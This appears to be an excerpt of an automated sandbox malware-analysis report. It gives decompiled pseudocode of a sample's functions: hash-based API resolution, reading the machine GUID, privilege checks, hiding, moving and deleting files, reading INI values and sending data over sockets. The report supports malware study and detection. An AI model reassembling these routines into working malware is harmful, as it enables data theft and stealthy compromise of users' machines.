                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: InformationToken
                          • String ID: IDA
                          • API String ID: 4114910276-365204570
                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                          0x00402c10
                          0x00402c15
                          0x00402c1b
                          0x00402c1e

                          APIs
                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc
                          • String ID: s1@
                          • API String ID: 190572456-427247929
                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                          0x00404a56
                          0x00404a65
                          0x00404a6a
                          0x00404ad1
                          0x00404ad1
                          0x00404a6c
                          0x00404a71
                          0x00404a79
                          0x00404a85
                          0x00404a9a
                          0x00404a9e
                          0x00404acb
                          0x00000000
                          0x00404aa0
                          0x00404aac
                          0x00404abc
                          0x00404ac1
                          0x00404ac6
                          0x00404ac6
                          0x00404a9e
                          0x00404ad9

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateOpenProcessQueryValue
                          • String ID:
                          • API String ID: 1425999871-0
                          • Opcode ID: d1f2fb2556a871af1fc4752e03a9bf04d918b6bfb0020d432be877112e0c6869
                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                          • Opcode Fuzzy Hash: d1f2fb2556a871af1fc4752e03a9bf04d918b6bfb0020d432be877112e0c6869
                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                          0x00402b8c
                          0x00402b92
                          0x00402b96
                          0x00402b9e
                          0x00402ba3
                          0x00402baa

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                          Download Yara Rule
                          C-Code - Quality: 40%
                          			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                          0x004060c6
                          0x004060d5
                          0x004060d8
                          0x004060f4
                          0x004060f6
                          0x004060fb
                          0x0040610a
                          0x00406115
                          0x0040611c
                          0x0040611e
                          0x00406121
                          0x00000000
                          0x0040612a
                          0x0040612f

                          APIs
                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CheckMembershipToken
                          • String ID:
                          • API String ID: 1351025785-0
                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404056 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E00404056(void* __ebx, intOrPtr _a4) {
				intOrPtr* _t5;
				void* _t6;
				void* _t14;

				_t14 = E00402B7C(0x208);
				if(_t14 == 0) {
					L4:
					return 0;
				}
				E00402B4E(_t14, 0, 0x208);
				_t5 = E004031E5(__ebx, 0xa, 0xc7f71852, 0, 0);
				_t6 =  *_t5(0, _a4, 0, 0, _t14); // executed
				if(_t6 != 0) {
					E00402BAB(_t14);
					goto L4;
				}
				return _t14;
			}






                          0x00404066
                          0x0040406b
                          0x004040a0
                          0x00000000
                          0x004040a0
                          0x00404072
                          0x00404083
                          0x0040408f
                          0x00404093
                          0x0040409a
                          0x00000000
                          0x0040409f
                          0x00000000

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFolderPathProcess
                          • String ID:
                          • API String ID: 398210565-0
                          • Opcode ID: 21382643b5f60f7d3801c56f46f58bf1107391f6545fb4a807863915b34cde73
                          • Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
                          • Opcode Fuzzy Hash: 21382643b5f60f7d3801c56f46f58bf1107391f6545fb4a807863915b34cde73
                          • Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                          0x00403c68
                          0x00403c70
                          0x00403c78
                          0x00403c82
                          0x00403c8b
                          0x00403c8f
                          0x00403c72
                          0x00403c76
                          0x00403c76

                          APIs
                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateDirectory
                          • String ID:
                          • API String ID: 4241100979-0
                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                          0x0040643c
                          0x00406445
                          0x00406454

                          APIs
                          • GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID:
                          • API String ID: 1721193555-0
                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004044A7 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004044A7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				long _t9;
				void* _t10;

				E004031E5(_t10, 0, 0xf66be5a2, 0, 0);
				_t9 = GetPrivateProfileStringW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t9;
			}





                          0x004044b4
                          0x004044cb
                          0x004044ce

                          APIs
                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID:
                          • API String ID: 1096422788-0
                          • Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                          • Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
                          • Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                          • Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004049B3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004049B3(void* _a4, WCHAR* _a8, WCHAR* _a12, DWORD* _a16, void* _a20, DWORD* _a24) {
				int _t8;
				void* _t9;

				E004031E5(_t9, 2, 0xdc1011d7, 0, 0);
				_t8 = SHGetValueW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t8;
			}





                          0x004049c1
                          0x004049d8
                          0x004049db

                          APIs
                          • SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                          • Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
                          • Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                          • Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                          0x00404eed
                          0x00404ef2
                          0x00404efd
                          0x00404efd
                          0x00404f07
                          0x00404f0e

                          APIs
                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004049DC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004049DC(void* _a4, int _a8, WCHAR* _a12, DWORD* _a16) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 2, 0xeca4834b, 0, 0);
				_t6 = SHEnumKeyExW(_a4, _a8, _a12, _a16); // executed
				return _t6;
			}





                          0x004049ea
                          0x004049fb
                          0x004049fe

                          APIs
                          • SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Enum
                          • String ID:
                          • API String ID: 2928410991-0
                          • Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                          • Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
                          • Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                          • Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                          0x00403bdd
                          0x00403beb
                          0x00403bee

                          APIs
                          • MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                          0x0040428a
                          0x00404297
                          0x0040429a

                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                          0x00404a27
                          0x00404a35
                          0x00404a38

                          APIs
                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                          0x00403c15
                          0x00403c1d
                          0x00403c20

                          APIs
                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                          0x00402c2c
                          0x00402c34
                          0x00402c37

                          APIs
                          • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00408B2C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00408B2C(struct HINSTANCE__* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe0cf5891, 0, 0);
				_t4 = FreeLibrary(_a4); // executed
				return _t4;
			}





                          0x00408b39
                          0x00408b41
                          0x00408b44

                          APIs
                          • FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
